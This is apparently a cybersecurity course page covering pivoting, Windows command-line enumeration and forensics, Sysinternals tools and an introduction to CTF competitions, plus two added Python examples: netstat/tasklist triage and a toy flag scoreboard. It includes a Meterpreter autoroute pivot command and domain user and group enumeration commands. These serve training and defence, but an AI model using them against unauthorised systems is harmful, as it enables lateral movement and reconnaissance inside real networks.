It may be that your initial attack on a system gives you access to a machine or part of a network that seems unimportant to your target objectives. However, you can use that compromised location to find a way into more secured or inaccessible areas. This is known as pivoting, and we'll see in this section how to use pivoting techniques to expand our penetration of a network.

During post-exploitation enumeration you may find an additional network interface. In this case, you will need to “pivot” and start the process all over again.

Pivoting is the practice of moving from one identified network to the next. Pivoting often occurs whenever an additional IP address/network is discovered on an exploited host. There are multiple ways to pivot (plink.exe, ssh, portfwd etc.). The preferred method is with autoroute using Meterpreter. Upon successfully exploiting a host with an additional network interface, you can use the following command to forward all traffic through the newly exploited host.

  • meterpreter > run autoroute -s 172.16.6.0/24

Wireless Testing

WiFi and Bluetooth are everywhere today, but along with that convenience come vulnerabilities. How secure is your local hotspot? Your home network? Are there ways to attack mobile devices like tablets and smartphones? Let's explore how to exploit wireless protocols, devices, and infrastructures by learning to use the best tools and methods.

Web Exploitation

As pentesters, you will need to be familiar with a variety of potential targets. Sometimes you will find the way into a target is through a website, and while it's easy to assume that websites are fairly safe and secure, you may be surprised in this section to see that there are many potential weaknesses in the constantly evolving environment of the web.

IDS/IPS Tools

A great free option for intrusion detection is Security Onion. Doug Burks and the Security Onion Solutions team consistently produce ISOs with updated builds, so be sure to keep your instance up to date. It runs on Linux, which you can get for free, and includes monitoring and log management tools. You can literally get it up and running in about 8 minutes; just remember to increase your processing cores (2) and RAM (40 GB), and add an extra interface ;-).

Windows Forensics

The Windows operating system has come a long way. You literally can't do anything in Windows without it being logged somewhere. It is important that you understand some of the common functions of the operating system. Let's look at some commands and tools that will help identify current settings and possible vulnerabilities.

You should feel comfortable at the Windows command line. Here are some commands you can use to identify important information on a windows operating system. Keep in mind that attackers use the same commands as part of the post-exploitation process. 

To get a good overview of the current system:

  • C:> systeminfo

To identify the current user:

  • C:> whoami
  • C:> echo %username%

To view all the users:

  • C:> net users

To view all the users on the domain:

  • C:> net users /domain

To view domain properties of a specific user:

  • C:> net user "user1" /domain

To view all of the groups on a domain:

  • C:> net groups /domain

To view a specific group:

  • C:> net groups "Domain Admins" /domain

To view the firewall profiles:

  • C:> netsh advfirewall show allprofiles

To view a verbose output of all scheduled tasks:

  • C:> schtasks /query /fo LIST /v

To see a list of started services:

  • C:> net start

To view a list of current drivers:

  • C:> driverquery

To view the Address Resolution Protocol (ARP) table: 

  • C:> arp -a

To view current connections and port status:

  • C:> netstat -ano

To view other host names on the network:

  • C:> net view /all

To view file/printer shares on a remote machine:

  • C:> net view \\computername

To view logged on users:

  • C:> psloggedon \\computername

To view a remote machine's NetBIOS Remote Name Table

  • C:> nbtstat -A 10.0.6.202
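
The commands above answer one question at a time; during an investigation you want their output joined up. The Python script below is an added example (not course material) that parses constructed netstat -ano output together with constructed tasklist output (tasklist is a standard Windows command not listed above) so each socket is tied to the process that owns it, then lists the listening ports and any connection whose far end is outside the local network.

```python
# Added example (not from the course material): join `netstat -ano` with `tasklist`
# output so every socket is tied to the process that owns it, then pull out listeners
# and connections that leave the local network. Both outputs below are constructed.
import ipaddress
import re

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.0.6.202:49712       10.0.6.1:445           ESTABLISHED     4
  TCP    10.0.6.202:49800       203.0.113.10:4444      ESTABLISHED     5120
  UDP    0.0.0.0:137            *:*                                    4
"""

TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0        148 K
svchost.exe                    876 Services                   0     12,340 K
powershell.exe                5120 Console                    1     64,120 K
"""


def parse_tasklist(text):
    """{pid: image name} from the default tasklist table."""
    pids = {}
    for line in text.splitlines():
        m = re.match(r"^(?P<name>\S.*?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$", line)
        if m:
            pids[int(m["pid"])] = m["name"]
    return pids


def split_endpoint(endpoint):
    """'10.0.6.1:445' -> ('10.0.6.1', 445); '[::]:0' -> ('::', 0); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(text, tasklist_text):
    """One record per socket line, with the owning image name joined in by PID."""
    images = parse_tasklist(tasklist_text)
    sockets = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = parts[:3]
        state = parts[3] if proto == "TCP" else ""   # UDP lines carry no state column
        pid = int(parts[-1])
        sockets.append({"proto": proto, "local": local, "foreign": foreign,
                        "state": state, "pid": pid, "image": images.get(pid, "?")})
    return sockets


def listening_ports(netstat_text, tasklist_text):
    """(proto, port, image) for every bound listener; a bound UDP socket counts as one."""
    return [(s["proto"], split_endpoint(s["local"])[1], s["image"])
            for s in parse_netstat(netstat_text, tasklist_text)
            if s["state"] == "LISTENING" or s["proto"] == "UDP"]


def external_connections(netstat_text, tasklist_text, local_nets=("10.0.6.0/24",)):
    """Connections whose far end is outside the local networks: the first thing to
    explain during triage (in the sample, a PowerShell process talking to port 4444)."""
    nets = [ipaddress.ip_network(n) for n in local_nets]
    external = []
    for s in parse_netstat(netstat_text, tasklist_text):
        host, _ = split_endpoint(s["foreign"])
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            continue  # '*' placeholders on UDP sockets
        if addr.is_unspecified or addr.is_loopback or any(addr in n for n in nets):
            continue
        external.append((s["proto"], s["local"], s["foreign"], s["state"], s["pid"], s["image"]))
    return external


if __name__ == "__main__":
    print("listening:", listening_ports(NETSTAT_SAMPLE, TASKLIST_SAMPLE))
    print("leaving the LAN:", external_connections(NETSTAT_SAMPLE, TASKLIST_SAMPLE))
```

The PID column is the join key: netstat -ano tells you a socket exists, tasklist tells you which image holds it, and only the combination tells you that the unexpected outbound connection belongs to a PowerShell process rather than a browser. Replace local_nets with your own address ranges when you run this against real output.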

Windows Sysinternals is a suite of utilities designed to help you manage, troubleshoot and diagnose your Windows systems and applications. To use the tools from any command line, simply unpack the zip file and copy the tools to the System32 folder. Let's look at a few tools.

One of the most used tools in the suite is Process Explorer so we'll start there.

  • C:> procexp

An alternative to Process Explorer is the Process Monitor:

  • C:> procmon

To view programs configured to run during system bootup or login:

  • C:> autoruns

To view a listing of all TCP and UDP endpoints:

  • C:> tcpview

To view important system information and display it on the desktop:

  • C:> bginfo

Incident Handling & Response

Threat Hunting

Intro to Malware Analysis

Intro to Memory Forensics

Capture the Flag (CTF)

One of the toughest and yet most enjoyable aspects of cybersecurity training is putting your new-found knowledge to work. There is so much to learn and you’re probably wondering what you can do with it all. Well like other fields of technology, in cyber there are a variety of live exercises known collectively as capture-the-flag, or CTF for short. These are competitions where you compete with other hackers and hacker teams from all over the world to test your skills against a variety of problems known as challenges. While there are prizes for the highest scoring competitors, for most of us the fun comes from trying to solve different types of problems that will test all of the skills you will learn in your cyber training.

Format

There are a few different kinds of CTFs but here we’ll discuss the most popular kind which is the “Jeopardy-style” competitions. When you start a competition you will go to a web page with all the challenge categories listed. Each set will display the challenge categories the way you would see the categories on “Jeopardy!” with a possible point score for each challenge. When you click on a challenge you will see below the title and the point score there is an input box for a “flag.” A flag is just a string of text that represents the solution, and when you find the flag, you have solved the challenge and you would then enter that flag into this field.

CTFs typically have a time limit of 1-3 days but as long as you follow the posted competition rules you are free to use any tools and methods you like to solve challenges. This is where your team becomes really important since you can divide the challenges so that team members with cryptography skills can focus on crypto challenges, and so forth.

Categories

Competitions try to cover a variety of knowledge areas, so the more you study the better prepared you will be to investigate and solve challenges. The categories will normally be a mixture of basic skills (stuff that all hackers and pentesters should know) and advanced topics such as analysis, cryptography, etc. Here are some common categories you may encounter in a competition:

  • Trivia — questions that can range from basic (“what does HTML stand for?”) to obscure (“what was released on Nov. 2, 1988?”)
  • Crypto — challenges that cover different types of encryption
  • Binary analysis — the use of tools to examine the binary code of a program
  • Recon — hunting for hidden clues on a network or the Internet
  • Forensics — examination of a file or computer system to search for evidence (of a crime, for example)
  • Web — challenges that cover websites and web protocols, web browsers, etc.
  • Bash/CLI — command-line challenges
  • Scripting/coding — solving code problems, typically (but not always) in JavaScript, PHP, or Python
  • Password cracking — challenges that involve solving passwords and hashes
  • Reverse engineering — using tools and methods to examine malware for clues about how it works

Finding a CTF

Most security conferences and events will have at least one CTF competition on-site. These can be a great experience if you can attend in person, but keep in mind that there are typically admission fees and sometimes competition fees, so be sure to plan ahead by checking out the event website and Twitter feed to determine the cost of tickets and any other fees.

An easier path to CTF mastery is to register for one of the numerous online competitions that occur on a regular basis. You will be competing with hackers from all around the world but you and your team can work on challenges from the comfort of home or get together at a library, coffeehouse, or cafe. Online CTFs are almost always free to play and are usually run by universities, companies (like Google and MITRE), and even governments.

Preparation

Once you have registered for a CTF, you’ll want to find out as much as you can about the event so you can prepare to win! There is usually an archive on GitHub that contains the CTF challenges and solutions from previous years so start there; the categories and challenges will change from year to year of course, but it’s good practice to look through them anyway since the same people may be working on this year’s challenges. Sometimes a CTF from a previous year is still available on the Internet so it can be useful to try it out to get a sense of how tough it is (for example, check out the 2018 Google CTF in the resources below).

The next step is to see if you can find any “walkthroughs” (sometimes called “write-ups”) for any past CTF events. The easiest way to do this is to Google the CTF or even a specific challenge and see what results come back. You will find that there are often blog posts, PDFs, and even YouTube videos that show how to solve the exact challenge you are interested in. You’ll want to try to find the solution to a challenge on your own first of course, but if you just can’t figure it out, walkthroughs are a great resource. Even if you solve a challenge without any help, walkthroughs can be useful since there is often more than one way to find a solution; you might find your solution is easier, and then you can write your own walkthrough!

Tips

  • Flags normally have to be entered exactly as they are discovered, so it’s best to copy and paste them, since a typo will cause your solution to be invalid.
  • The standard flag format is “flag{}” but sometimes challenges can be devious and not conform to the standard. You will usually be informed about this, but not always!
  • For the harder challenges, you may see there is a hint available. Sometimes they can be helpful if you get stuck, but keep in mind you will probably lose some points by using them.
  • The challenges cover so many areas of knowledge that it’s usually pretty hard to compete as an individual, so if you have the chance to join a team or start one yourself, do it! A strong team will have people who are skilled in one or more areas, so that, hopefully, you can tackle as many challenge categories as possible.
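The submission and scoring rules described under Format and Tips, as an added example that is not code from this page or from any real CTF platform: a toy Jeopardy-style scoreboard in Python that stores only flag digests, compares submissions exactly (in constant time), warns about text that does not follow the usual flag{} shape, and deducts a fixed per-challenge cost when a hint has been revealed. The challenge names, flags, hint text and hint cost are constructed for the example, and the fixed deduction is an assumption (the page only says hints "probably" cost points).

```python
import hashlib
import hmac
import re
from dataclasses import dataclass, field

# Added example, not from the page: a minimal Jeopardy-style board that keeps flag digests only.
FLAG_RE = re.compile(r"^flag\{[^{}\s]+\}$")

def flag_digest(flag: str) -> str:
    return hashlib.sha256(flag.encode("utf-8")).hexdigest()

def looks_like_flag(candidate: str) -> bool:
    """Warn-only check for the usual flag{...} shape; some challenges break it."""
    return FLAG_RE.fullmatch(candidate.strip()) is not None

@dataclass
class Challenge:
    name: str
    points: int
    flag_hash: str          # digest of the real flag, never the plaintext
    hint: str = ""
    hint_cost: int = 0      # points forfeited once the hint is revealed (assumption)

@dataclass
class Team:
    solved: dict = field(default_factory=dict)  # challenge name -> points earned
    hints_used: set = field(default_factory=set)

    def score(self) -> int:
        return sum(self.solved.values())

def reveal_hint(team: Team, chal: Challenge) -> str:
    team.hints_used.add(chal.name)           # reading a hint lowers the solve's value
    return chal.hint

def submit(team: Team, chal: Challenge, candidate: str) -> str:
    """Return 'correct', 'incorrect' or 'already_solved'; the match must be exact."""
    if chal.name in team.solved:
        return "already_solved"
    # strip() only drops the newline a paste often adds; digests are compared in constant time.
    if not hmac.compare_digest(flag_digest(candidate.strip()), chal.flag_hash):
        return "incorrect"
    cost = chal.hint_cost if chal.name in team.hints_used else 0
    team.solved[chal.name] = max(chal.points - cost, 0)
    return "correct"

BOARD = {  # constructed sample board; the flags are invented for this example
    "web-100": Challenge("web-100", 100, flag_digest("flag{cookie_monster}")),
    "crypto-300": Challenge("crypto-300", 300, flag_digest("flag{rot13_twice}"), "try a classical cipher", 50),
}
```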

Resources

If you decide to try a CTF there are many resources available to help you prepare. Here are some to start with:

  • CTFTime -- A clearinghouse for CTF information from around the world, including rankings, upcoming competitions, etc.
  • 2018 Google CTF -- Google still has its CTF from last year available
  • MITRE Cyber Academy -- a good introductory resource
  • CTF Resources -- another good site for beginners
  • CTF Field Guide -- a free online book about getting started with CTFs
  • SecurityCTF subreddit -- this is a useful resource for walkthroughs, news, and rumors about CTFs
  • Over the Wire -- this site has many games to help you learn about different types of skills needed for CTF challenges
  • picoCTF -- Carnegie Mellon keeps its beginners’ CTF available year-round
  • CTFs GitHub -- a large repository of write-ups and resources